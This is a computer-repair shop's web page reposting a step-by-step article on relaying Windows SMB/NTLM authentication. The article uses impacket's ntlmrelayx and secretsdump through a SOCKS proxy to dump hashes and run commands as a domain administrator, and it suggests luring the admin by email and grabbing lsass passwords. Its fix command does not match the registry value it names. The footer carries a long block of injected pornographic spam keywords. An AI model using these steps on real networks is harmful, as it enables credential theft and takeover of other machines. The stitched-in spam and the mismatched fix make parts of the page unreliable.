錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
Windows SMB請(qǐng)求重放攻擊分析

作者: 佚名  日期:2018-07-10 18:05:05   來(lái)源: 本站整理

前言
smb中繼或叫smb請(qǐng)求重放攻擊,B是一個(gè)smb服務(wù)器,A來(lái)進(jìn)行認(rèn)證,B將A的認(rèn)證信息轉(zhuǎn)發(fā)到C上,如果A的憑證在C上認(rèn)證成功就能進(jìn)行下一步操作,如創(chuàng)建服務(wù)執(zhí)行命令。如果在域中控制了某些常用服務(wù),如:WEB OA系統(tǒng)、文件共享等服務(wù)則可以嘗試使用SMB中繼攻擊來(lái)引誘域管理員訪問(wèn)達(dá)到獲取其他機(jī)器權(quán)限的目的。

環(huán)境
192.168.123.10 win 7  域管理員(administrator)機(jī)器
192.168.123.11 kali linux 攻擊者機(jī)器
192.168.123.100 域內(nèi)普通用戶-受害者機(jī)器
攻擊演示
需要smb簽名關(guān)閉下才能進(jìn)行利用,只有windows server的smb簽名是默認(rèn)開啟的,像Windows 7的簽名默認(rèn)關(guān)閉
可以用nmap探測(cè)smb是否關(guān)閉
nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

下載impacket工具包
git clone https://github.com/CoreSecurity/impacket.git
192.168.123.11(攻擊者機(jī)器) 執(zhí)行
ntlmrelayx.py -tf hosts.txt -socks -smb2support
hosts.txt里面的內(nèi)容是要進(jìn)行中繼的IP,機(jī)器越多成功率越高,我這里只有一個(gè)IP

然后讓192.168.123.10(域管理員機(jī)器) 訪問(wèn)192.168.123.11(攻擊者機(jī)器)的共享,可以架設(shè)一個(gè)web服務(wù)器,html頁(yè)面里嵌入\\攻擊者地址,我這里為了方便演示就在本地寫一個(gè)html

192.168.123.10(域管理員機(jī)器)訪問(wèn)共享時(shí),提示如下說(shuō)明中繼成功

[*] Authenticating against smb://192.168.123.100 as Z3R0\Administrator SUCCEED [*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy
然后在本地會(huì)創(chuàng)建一個(gè)socks4代理
在 /etc/proxychains.conf 的最后一行填入
socks4  192.168.123.11 1080
配置好socks4代理后攻擊者執(zhí)行
proxychains python secretsdump.py z3r0/Administrator@192.168.123.100
這樣secretsdump.py發(fā)送出的認(rèn)證數(shù)據(jù)包經(jīng)過(guò)socks4代理中繼就能成功進(jìn)行認(rèn)證

如果不加上其他參數(shù)的話ntlmrelayx.py默認(rèn)會(huì)dumphash

先看看視頻效果圖
上傳時(shí) freebuf提示圖片超出大小限制(希望小編能處理下:) ),效果圖地址:/article/UploadPic/2018-7/2018710164730287.gif
原理分析
每一步smb請(qǐng)求都被192.168.123.11(攻擊者機(jī)器)轉(zhuǎn)發(fā)到了其他機(jī)器上

1. 192.168.123.10(域管理員機(jī)器)向192.168.123.11(攻擊者機(jī)器)商量smb協(xié)議版本

2. 192.168.123.11(攻擊者機(jī)器)向192.168.123.100(受害者機(jī)器)商量smb協(xié)議版本
3.192.168.123.100(受害者機(jī)器)向192.168.123.11(攻擊者機(jī)器)回答支持smb v2

4.192.168.123.11(攻擊者機(jī)器)向192.168.123.10(域管理員機(jī)器)回答支持smb v2
協(xié)商完就開始認(rèn)證了

1.192.168.123.10(域管理員機(jī)器)向192.168.123.11(攻擊者機(jī)器)發(fā)出NTLMSSP_NEGOTIATE認(rèn)證協(xié)商請(qǐng)求
2.192.168.123.11(攻擊者機(jī)器)向192.168.123.100(受害者機(jī)器)發(fā)出NTLMSSP_NEGOTIATE認(rèn)證協(xié)商請(qǐng)求
3.192.168.123.100(受害者機(jī)器)向192.168.123.11(攻擊者機(jī)器)進(jìn)行響應(yīng),響應(yīng)包里含有challenge

4.同樣192.168.123.11(攻擊者機(jī)器)向192.168.123.10(域管理員機(jī)器)進(jìn)行響應(yīng),響應(yīng)包里含有challenge5.192.168.123.10(域管理員機(jī)器)收到challenge后用hash將challenge加密,作為NTLM Response字段發(fā)送給192.168.123.11(攻擊者機(jī)器)

6.同樣,192.168.123.11(攻擊者機(jī)器)將域管理員的認(rèn)證請(qǐng)求也發(fā)往192.168.123.100(受害者機(jī)器)

在響應(yīng)包中可以看到已經(jīng)認(rèn)證成功了

有了管理員權(quán)限就能為所欲為了

因?yàn)闆](méi)有目標(biāo)機(jī)器密碼所以不能進(jìn)行正常的smb認(rèn)證,ntlmrelayx腳本的socks4代理作用就是處理本地發(fā)往192.168.123.100 (受害者機(jī)器)流量起一個(gè)中繼作用,因?yàn)橐呀?jīng)認(rèn)證過(guò)了就不用再進(jìn)行認(rèn)證,密碼隨便填一個(gè)就行,使用socks4代理時(shí)的smb的身份認(rèn)證是域管理員。
可以通過(guò)創(chuàng)建服務(wù)來(lái)執(zhí)行命令,當(dāng)然ntlmrelayx.py也可以做到.
python ntlmrelayx.py -tf hosts.txt -c 'cmexe /c calc.exe'

當(dāng)192.168.123.10(域管理員機(jī)器)再次訪問(wèn)共享時(shí),192.168.123.100(受害者機(jī)器)上可以看到calc已經(jīng)運(yùn)行了

總結(jié)
1.可以通過(guò)給域管理員發(fā)送郵件的方式來(lái)讓他觸發(fā)smb請(qǐng)求
2.當(dāng)然如果域管理員觸發(fā)了smb中繼請(qǐng)求了也可以針對(duì)他所在那一臺(tái)機(jī)器做中繼,這樣就能執(zhí)行命令抓lsass.exe進(jìn)程中的明文密碼了
修復(fù)建議
將注冊(cè)表項(xiàng)”RequireSecuritySignature”設(shè)置為 1 可以啟用 SMB 簽名
powershell執(zhí)行
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" RequireSecureNegotiate -Value 1 –Force
 



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲av无码一区二区三区人妖| 国内精品久久久久久无码不卡| 成年午夜无码av片在线观看| 丰满日韩放荡少妇无码视频| 色窝窝无码一区二区三区 | 2024你懂的网站无码内射| 久久精品aⅴ无码中文字字幕不卡| 亚洲成在人线在线播放无码| 亚洲精品无码专区久久同性男| 无码无遮挡又大又爽又黄的视频| 孕妇特级毛片WW无码内射| 国产免费久久久久久无码| 亚洲精品GV天堂无码男同| 亚洲国产精品无码久久久不卡| 久久无码av亚洲精品色午夜| 无码国产精品一区二区免费vr | 亚洲精品无码不卡在线播放HE| 精品深夜AV无码一区二区老年 | 久久精品中文字幕无码绿巨人| 波多野结衣VA无码中文字幕电影 | 无码一区二区三区在线| 日韩精品人妻系列无码专区| 久久久91人妻无码精品蜜桃HD| 亚洲日韩乱码中文无码蜜桃| 伊人久久综合无码成人网| 免费无码又黄又爽又刺激| 毛片无码免费无码播放| 亚洲日韩精品无码一区二区三区 | 无码无需播放器在线观看| 无码H肉动漫在线观看| 在线精品无码字幕无码AV| 成在人线av无码免费高潮水 | 中文字幕人妻无码系列第三区| 无码人妻精品内射一二三AV| 精品久久久久久久无码| 日韩乱码人妻无码系列中文字幕| 亚洲一区爱区精品无码| 国产AV无码专区亚洲AV男同| 国产AV无码专区亚洲Av| 亚洲av无码乱码国产精品fc2| 久久无码av三级|